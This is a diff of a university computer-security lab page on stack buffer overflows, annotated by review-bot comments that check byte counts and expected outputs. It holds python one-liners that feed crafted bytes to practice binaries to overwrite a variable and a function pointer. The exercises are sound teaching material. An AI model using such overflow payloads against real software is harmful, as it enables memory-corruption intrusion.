This shows you the differences between two versions of the page.
cns:labs:lab-03 [2020/10/25 15:33] mihai.dumitru2201 [3. Off-by-one Overflow] |
cns:labs:lab-03 [2022/10/24 19:05] (current) mihai.dumitru2201 [2. Overflow a Pointer] |
Line 84: | Line 84: | ||
==== 1. Assembly Function Calls ==== | ==== 1. Assembly Function Calls ==== | ||
- | Enter the ''asm-function-call/'' subfolder in the lab archive folder. Check the source code so far. Compile it and run it:<code> | + | Enter the ''01-asm-function-call/'' subfolder in the lab archive folder. Check the source code so far. Compile it and run it:<code> |
student@host:~/cns/labs/03-stack-buffer-management/01-asm-function-call $ ls | student@host:~/cns/labs/03-stack-buffer-management/01-asm-function-call $ ls | ||
Makefile function_call.asm | Makefile function_call.asm | ||
Line 113: | Line 113: | ||
==== 2. Overflow a Pointer ==== | ==== 2. Overflow a Pointer ==== | ||
- | Enter the ''owerflow-ptr/'' subfolder in the lab archive folder. Check the source code so far. Compile it and run it:<code> | + | Enter the ''02-owerflow-ptr/'' subfolder in the lab archive folder. Check the source code so far. Compile it and run it:<code> |
student@host:~/cns/labs/03-stack-buffer-management/02-overflow-ptr $ ls | student@host:~/cns/labs/03-stack-buffer-management/02-overflow-ptr $ ls | ||
Makefile overflow_ptr.c | Makefile overflow_ptr.c | ||
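Review bot: the typo survives the rename. The new text says ''02-owerflow-ptr/'' while the listing directly below shows the directory as ''02-overflow-ptr''; change the prose to ''02-overflow-ptr/'' so the path in the sentence matches what the student actually sees and can be copied.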
Line 134: | Line 134: | ||
Let's first automate the delivery of input to the buffer by using Python. Let's write 16 bytes of ''A'' characters:<code> | Let's first automate the delivery of input to the buffer by using Python. Let's write 16 bytes of ''A'' characters:<code> | ||
- | python -c 'print(16*"A")' | ./overflow_ptr | + | python -c 'import sys; sys.stdout.buffer.write(16*b"A")' | ./overflow_ptr |
Provide buffer input: Dumb number value is 0x12345678. | Provide buffer input: Dumb number value is 0x12345678. | ||
Buffer is AAAAAAAAAAAAAAAA | Buffer is AAAAAAAAAAAAAAAA | ||
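Review bot: this rewrite changes the byte count, not only the encoding. ''print(16*"A")'' emitted 17 bytes (16 ''A'' characters plus a trailing newline), whereas ''sys.stdout.buffer.write(16*b"A")'' emits exactly 16 and no newline. That is harmless for this run, which stays inside the buffer, but the later steps of this section count the newline explicitly and their expected outputs contain the ''0x0a'' byte it produced. If those transcripts are meant to stay valid, write ''16*b"A" + b"\n"'' here and in the following commands; otherwise the later expected values need to be re-run.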
Line 143: | Line 143: | ||
Let's now increase the number of bytes we are writing to 30, then 35, then 36:<code> | Let's now increase the number of bytes we are writing to 30, then 35, then 36:<code> | ||
- | student@host:~/cns/labs/03-stack-buffer-management/02-overflow-ptr $ python -c 'print(30*"A")' | ./overflow_ptr | + | student@host:~/cns/labs/03-stack-buffer-management/02-overflow-ptr $ python -c 'import sys; sys.stdout.buffer.write(30*b"A")' | ./overflow_ptr |
Provide buffer input: Dumb number value is 0x12345678. | Provide buffer input: Dumb number value is 0x12345678. | ||
Buffer is AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA | Buffer is AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA | ||
Knock, knock! Who's there? Recursion. Recursion who? Knock, knock! | Knock, knock! Who's there? Recursion. Recursion who? Knock, knock! | ||
- | student@host:~/cns/labs/03-stack-buffer-management/02-overflow-ptr $ python -c 'print(35*"A")' | ./overflow_ptr | + | student@host:~/cns/labs/03-stack-buffer-management/02-overflow-ptr $ python -c 'import sys; sys.stdout.buffer.write(35*b"A")' | ./overflow_ptr |
Provide buffer input: Dumb number value is 0x12345600. | Provide buffer input: Dumb number value is 0x12345600. | ||
Buffer is AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA | Buffer is AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA | ||
Knock, knock! Who's there? Recursion. Recursion who? Knock, knock! | Knock, knock! Who's there? Recursion. Recursion who? Knock, knock! | ||
- | student@host:~/cns/labs/03-stack-buffer-management/02-overflow-ptr $ python -c 'print(36*"A")' | ./overflow_ptr | + | student@host:~/cns/labs/03-stack-buffer-management/02-overflow-ptr $ python -c 'import sys; sys.stdout.buffer.write(36*b"A")' | ./overflow_ptr |
Provide buffer input: Dumb number value is 0x1234000a. | Provide buffer input: Dumb number value is 0x1234000a. | ||
Buffer is AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA | Buffer is AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA | ||
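Review bot: the expected outputs kept as unchanged context no longer follow from the new commands. With the 36-byte buffer the section later describes and no newline appended, 35 ''A'' characters plus the terminating NUL fit entirely in the buffer, so ''dumb_number'' should still print ''0x12345678'' rather than ''0x12345600'', and 36 ''A'' characters should give ''0x12345600'' (NUL in the low byte) rather than ''0x1234000a''; the ''0x0a'' in those values is the newline that ''print'' used to append. Either re-run the three commands and update the transcript, or append ''b"\n"'' to each payload so the shown values remain reproducible.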
Line 167: | Line 167: | ||
Now let's try to write more, let's go one byte after the ''dumb_number variable'' by writing 39 bytes: 36 bytes for the buffer, 3 bytes for the ''dumb_number'' variable, 1 byte for the newline and one byte for the NUL-byte going further than the ''dumb_number'' variable:<code> | Now let's try to write more, let's go one byte after the ''dumb_number variable'' by writing 39 bytes: 36 bytes for the buffer, 3 bytes for the ''dumb_number'' variable, 1 byte for the newline and one byte for the NUL-byte going further than the ''dumb_number'' variable:<code> | ||
- | student@host:~/cns/labs/03-stack-buffer-management/02-overflow-ptr $ python -c 'print(39*"A")' | ./overflow_ptr | + | student@host:~/cns/labs/03-stack-buffer-management/02-overflow-ptr $ python -c 'import sys; sys.stdout.buffer.write(39*b"A")' | ./overflow_ptr |
Provide buffer input: Dumb number value is 0x0a414141. | Provide buffer input: Dumb number value is 0x0a414141. | ||
Buffer is AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA | Buffer is AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA | ||
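Review bot: the explanation on this line still counts "1 byte for the newline" among the 39 bytes and says the NUL goes past ''dumb_number'', but the new command sends 39 ''A'' characters and nothing else. Without the newline, the three ''A'' bytes land in the low three bytes of ''dumb_number'' and the terminating NUL in its high byte, so the transcript value ''0x0a414141'' becomes ''0x00414141'' and nothing spills past the variable. Either drop the newline from the prose and fix the value, or add ''b"\n"'' to the payload so the text stays true.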
Line 173: | Line 173: | ||
Let's see what happens if we overwrite more data, we write ''41'' bytes:<code> | Let's see what happens if we overwrite more data, we write ''41'' bytes:<code> | ||
- | student@host:~/cns/labs/03-stack-buffer-management/02-overflow-ptr $ python -c 'print(41*"A")' | ./overflow_ptr | + | student@host:~/cns/labs/03-stack-buffer-management/02-overflow-ptr $ python -c 'import sys; sys.stdout.buffer.write(41*b"A")' | ./overflow_ptr |
Provide buffer input: Dumb number value is 0x41414141. | Provide buffer input: Dumb number value is 0x41414141. | ||
Buffer is AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA | Buffer is AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA | ||
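Review bot: ''dumb_number'' still comes out as ''0x41414141'' with the new command, but the sentence that follows in the next section ("we've overwritten three bytes of the ''f_ptr'' function pointer: ''0x00'', ''0x0a'', and ''0x41''") depends on the newline. Without it, 41 ''A'' characters plus the terminating NUL overwrite only two bytes of ''f_ptr'' (''0x41'' and ''0x00''). Adjust that sentence to match, or keep the newline in the payload.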
Line 186: | Line 186: | ||
We now see that we've overwritten three bytes of the ''f_ptr'' function pointer that we jump to: ''0x00'' (the NUL byte), ''0x0a'' (the newline), and ''0x41'' (one of the 41 ''A'' characters we've written). | We now see that we've overwritten three bytes of the ''f_ptr'' function pointer that we jump to: ''0x00'' (the NUL byte), ''0x0a'' (the newline), and ''0x41'' (one of the 41 ''A'' characters we've written). | ||
- | Let's see how we could write some random hex data. Let's overwrite the ''dumb_number'' value with ''0x87654321'', that is the reverse of how it currently is. We will write ''32'' bytes of ''A'' and another eight properly arranged bytes to overwrite the ''dumb_number'' variable:<code> | + | Let's see how we could write some random hex data. Let's overwrite the ''dumb_number'' value with ''0x87654321'', that is the reverse of how it currently is. We will write ''32'' bytes of ''A'' and another eight properly arranged bytes to overwrite the ''dumb_number'' variable: |
- | $ python -c 'import sys; sys.stdout.buffer.write(32*b"A" + b"\x00\x00\x00\x00\x21\x43\x65\x87")' | ./overflow_ptr | + | <code> |
+ | |||
+ | $ python -c 'import sys; sys.stdout.buffer.write(32*b"A" + b"\x21\x43\x65\x87\x00\x00\x00\x00")' | ./overflow_ptr | ||
Provide buffer input: Dumb number value is 0x87654321. | Provide buffer input: Dumb number value is 0x87654321. | ||
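Review bot: the new byte order looks wrong for the layout this section establishes. The earlier runs place ''dumb_number'' at offsets 36 to 39 of the input (35 ''A'' characters plus newline plus NUL clobbered only its low byte), so whatever the payload carries at offsets 36 to 39 is what ends up in the variable. The old payload ''32*b"A" + b"\x00\x00\x00\x00\x21\x43\x65\x87"'' puts ''21 43 65 87'' there, which reads as ''0x87654321'' in little-endian order and matches the unchanged transcript; the new ''32*b"A" + b"\x21\x43\x65\x87\x00\x00\x00\x00"'' puts those four bytes inside the buffer at offsets 32 to 35 and the four NUL bytes into ''dumb_number'', which should print ''0x00000000''. Unless the binary was rebuilt with a 32-byte buffer, revert the ordering, and have the "eight properly arranged bytes" sentence say which four pad the buffer and which four form the little-endian value. Moving ''<code>'' onto its own line is fine.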
Line 265: | Line 267: | ||
*[[https://eli.thegreenplace.net/2011/09/06/stack-frame-layout-on-x86-64|x64 stack frame tutorial]] | *[[https://eli.thegreenplace.net/2011/09/06/stack-frame-layout-on-x86-64|x64 stack frame tutorial]] | ||
- | *[[https://eli.thegreenplace.net/2011/02/04/where-the-top-of-the-stack-is-on-x86/|x32 stack frame tutorial]] | + | *[[https://eli.thegreenplace.net/2011/02/04/where-the-top-of-the-stack-is-on-x86/|x86 stack frame tutorial]] |
*[[http://security.cs.pub.ro/hexcellents/wiki/|Hexcellents - A collection of binary exploitation resources]] | *[[http://security.cs.pub.ro/hexcellents/wiki/|Hexcellents - A collection of binary exploitation resources]] | ||
* ''%%python -c 'import sys; sys.stdout.buffer.write(b"A" * 42 + b"\x44\x33\x22\x11")' | ./l33tb1n%%'' | * ''%%python -c 'import sys; sys.stdout.buffer.write(b"A" * 42 + b"\x44\x33\x22\x11")' | ./l33tb1n%%'' |
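Review bot: retitling the link from "x32" to "x86" is the right fix, since x32 names a separate ILP32 ABI on x86-64 while the linked article covers plain 32-bit x86. For symmetry, the neighbouring entry could be titled "x86-64 stack frame tutorial", which is also what its URL says.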